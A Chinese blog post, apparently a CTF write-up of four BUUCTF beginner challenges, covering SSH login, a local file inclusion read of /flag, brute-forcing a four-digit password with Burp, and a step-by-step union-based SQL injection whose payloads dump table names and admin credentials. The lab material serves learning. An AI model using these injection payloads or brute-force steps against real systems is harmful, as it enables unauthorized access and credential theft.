BUUCTF-Basic部分(4道)

news2024/12/24 0:27:01

目录

Linux Labs

BUU LFI COURSE 1

BUU BRUTE 1

 BUU SQL COURSE 1


Linux Labs

 第一个界面,给出了SSH
ssh 用户名:root 密码:123456 地址和端口为动态分配的
以及映射地址和端口(这个地址+端口是随机的)

node4.buuoj.cn:29804

使用xshell进行ssh进行连接,输入主机和端口号

 输入用户名和密码

成功ssh登入

在根目录下,找到了flag.txt的文件,拿到flag

BUU LFI COURSE 1

属于文件包含,这里文件包含时,不论什么类型文件都会被当作php文件执行

那么构造参数,猜测flag位置在根目录下

?file=/flag

成功回显flag内容

BUU BRUTE 1

这里是一个登录页面,使用bp抓包看一下,发现当输入错误用户名时,会回显“用户名错误”

那么我们尝试像admin,root等常用用户名,试出正确的用户名 admin,而且会回显密码为4位数字

如此可以确定思路,使用暴力破解,爆破4位数字密码(0000-9999) ,设置如下

密码四位整数,最小值为0,最大值为9999,设置递增步长为1,以探测每一个从0到9999的数字;由于密码为4位,所以对应不足四位的,需要以0补齐四位数。设置Min integer digits和Max integer digits的长度为4,设置小数点位数Min(Max) fraction digits为0

开始爆破,得到密码6490,在响应包中,可以看到flag回显 

 BUU SQL COURSE 1

上方左上角和右上角又热点和登录的选项,登陆选项尝试弱口令登录,发现无法判断用户名或者是密码是否有一项正确,放弃爆破,延题目寻找sql注入点

热点中存在三条热点测试新闻,随意点击一个抓包看一下

点击测试新闻2,发现id参数可控

payload:?id=1+and+1=1    页面正常回显;

              ?id=1+and1=2  页面没有回显,判断此处存在sql注入

 

接下来就是sql注入常规操作了,先判断回显位置

payload:?id=1+order+by+1,2  两列回显

               ?id=1+order+by+1,2,3  无回显

 判断,存在两处回显

开始判断数据库名,这里id后的参数不能是1,2,3,其他值均可

payload:?id=4+union+select+1,database()

 得到数据库名称news

判断表名

payload:

?id=4+union+select+1,(select+group_concat(table_name)+from+information_schema.tables+where+table_schema='news')

得到两个表名admin,contents

 判断admin表的列名

payload:?id=4+union+select+1,(select+group_concat(column_name)+from+information_schema.columns+where+table_schema='news'+and+table_name='admin')

得到三个列名id,username,password

 查询username和password的内容

payload:?id=4+union+select+1,(select+group_concat(username)+from+admin)

 得到username内容,admin

payload:?id=4+union+select+1,(select+group_concat(password)+from+admin)

 得到password的内容,a3a052083543baa047445ec732e7260a

再回到登录页面输入

username:  admin

password:  a3a052083543baa047445ec732e7260a

得到flag

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/563804.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

R语言实践——使用 rWCVP 生成自定义清单

使用 rWCVP 生成自定义清单 介绍1. 特有物种清单2. 近特有物种清单2.1 在塞拉利昂和另一地区出现的物种2.2 在塞拉利昂和相邻地区出现的物种 3. 生成自定义报告 介绍 除了允许用户从世界维管植物名录(WCVP)创建清单外,rWCVP还提供了修改清单…

在小公司“混”了2年,我只认真做了5件事,如今顺利拿到字节 Offer

前言 是的,我一家小公司工作了整整两年时间,在入职这家公司前,也就是两年前,我就开始规划了我自己的人生,所以在两年时间里,我并未懈怠。 现如今,我已经跳槽到了字节,入职字节测试…

傅里叶级数 傅里叶变换 及应用

傅里叶级数和傅立叶变换是傅里叶分析的两个主要工具,它们之间有密切的关系。 什么是傅里叶级数 傅里叶级数是将一个周期函数分解为一系列正弦和余弦函数的和。它适用于周期性信号,可以将周期函数表示为一组振幅和相位不同的谐波分量的和。傅里叶级数展…

Netty编解码机制(二)

1.Netty入站和出站机制 1.1.基本介绍 1>.netty的组件设计: Netty的主要组件有Channel、EventLoop、ChannelFuture、ChannelHandler、ChannelPipe等; 2>.ChannelHandler充当了处理入站和出站数据的应用程序逻辑的容器.例如,实现ChannelInboundHandler接口(或ChannelInb…

Unity之如何接入google cardboard-xr-plugin实现android手机VR

前言 我们提到VR,总是会想到Oculus,HTC Vive,Pico等头戴VR设备,但是别忘了,最早Google就通过再手机端实现VR了,而且还推出过Cardboard手机盒子,让我们可以用最低的成本体验到VR效果。 插件下载 先说明一下,Unity在1028版本之前,支持过GoogleVR,但是后来因为统一…

Chapter8 :Physical Constraints(ug903)

8.1About Physical Constraints(关于物理约束) XilinxVivado集成设计环境(IDE)允许通过设置对象属性值对设计对象进行物理约束。示例包括: •I/O约束,如位置和I/O标准 •布局约束&…

惨败字节,苦心备战两个月斩获阿里offer,这份“258页软件测试面试宝典”也太顶了

测试三年有余,很多新学到的技术不能再项目中得到实践,同时薪资的涨幅很低,于是萌生了跳槽大厂的想法。 但大厂不是那么容易进的,前面惨败字节,为此我辛苦准备了两个月,又从小公司开始面试了半个月有余&…

k8s pv pvc的介绍|动态存储|静态存储

k8s pv pvc的介绍|动态存储|静态存储 1 emptyDir存储卷2 hostPath存储卷3 nfs共享存储卷4 PVC 和 PVNFS使用PV和PVC 4 搭建 StorageClass NFS,实现 NFS 的动态 PV 创建 1 emptyDir存储卷 当Pod被分配给节点时,首先创建emptyDir卷,并且只要该…

FPGA—可乐机拓展训练题(状态机)

题目:以可乐机为背景,一瓶可乐的价格还是 2.5 元。用按键控制投币(加入按键消抖功能),可以投 0.5 元硬币和 1 元硬币,投入 0.5 元后亮一个灯,投入 1 元后亮 2 个灯,投入 1.5 元后亮 …

【统计模型】学生课程类型选择影响因素分析

目录 学生课程类型选择影响因素分析 一、研究目的 二、数据来源和相关说明 三、描述性分析 3.1 样本描述 3.2 样本可视化 3.2.1 直方图 3.2.2 列联表 3.2.3 箱线图与折线图 3.2.4 相关性热力图 四、数学建模 4.1 无序多分类logistic回归模型 4.1.1 无序多分类logist…

STM32F030C8T6最小系统板和流水灯(原理图和PCB)

STM32F030C8T6最小系统板和流水灯。 嵌入式课的课程设计,要做个流水灯,我就顺便画个最小系统板,开源出来了,各位大佬指点指点,有哪里需要优化改进的。 那个WS2812的RGB灯用错引脚了,所以没法用PWM来控制&…

MQTT GUI 客户端 可视化管理工具

MQTT GUI 客户端 可视化管理工具 介绍 多标签页管理,同时打开多个连接提供原生性能,并且比使用 Electron 等 Web 技术开发的同等应用程序消耗的资源少得多支持 MQTT v5.0 以及 MQTT v3.1.1 协议,支持通过 WebSocket 连接至 MQTT 服务器以树…

数字信号处理7

昨天着重就是离散时间系统的复习,包括离散时间系统的分类有哪些,是根据什么进行分类的,要搞清楚,LTI系统是一个什么样的系统,以及卷积的操作,因果LTI等,回顾完这些之后,就开始了今天…

Python面向对象编程详细解析(都带举例说明!)

前言 Python面向对象编程(Object-Oriented Programming,简称OOP)是一种编程范式,它将数据和操作数据的方法封装在一起,形成一个对象。 Python中的面向对象编程包括以下内容: 目录点击对应章节可直接跳转…

数据治理项目易失败?企业数据治理的解决思路在这里

据Gartner 的一项调查显示,我国超过90%的数据治理项目都失败了。大家的感受也是如此:数据治理的项目不好落地,数据治理项目实施起来从理论到实践有一条巨大的鸿沟很难跨越。 失败的原因各种各样,总结起来大概有4类: …

编译原理个人作业--第六章——基于 编译原理 国防工业出版社 第三版

2 对表达式((a)(b)) (1) 按照表6.4属性文法构造抽象语法树 (2) 按6.17翻译模式构造表达式抽象语法树 5(1) 下列文法对整型常数、实型常熟世家加法运算符 生成表达式,当两个整型数相加,结果为整形,否则结果为实型 E → E T ∣ T E\r…

软件测试面试题

一、描述 TCP/IP 协议的层次结构,以及每一层中重要协议 TCP/IP(Transmission Control Protocol/Internet Protocol)是互联网的核心协议套件,它定义了在网络中进行通信的规则和标准。TCP/IP协议栈按照层次结构划分,每一…

【DataTable.js】DataTable基础应用

一、简介 DataTables是一个功能强大的Javascript库,用于向HTML表中添加交互特性,虽然简单性是整个项目的核心设计原则,但一开始可能会让人望而生畏。然而,采取这些第一步,让DataTables在你的网站上运行实际上是相当直…

测试——四元数绕轴旋转

float angle 40;Vector3 v rotatePoint.transform.position;Debug.Log("旋转向量 " v "__自身 " cube.transform.rotation);v.Normalize();Debug.Log(v);float f angle * Mathf.Deg2Rad / 2;float sinHalfAngle Mathf.Sin(f);float cosHalfAngle M…

智慧梁场3D建模

智慧梁场3D建模:数字化革命下的新起点 ​ 随着科技的迅猛发展,数字化已经成为了现代工业生产的必然趋势。作为传统工业的核心产业,建筑行业也在不断地探索数字化变革的新路径。而“智慧梁场3D建模”便是其中的一项杰出实践。 ​ 梁场是建筑…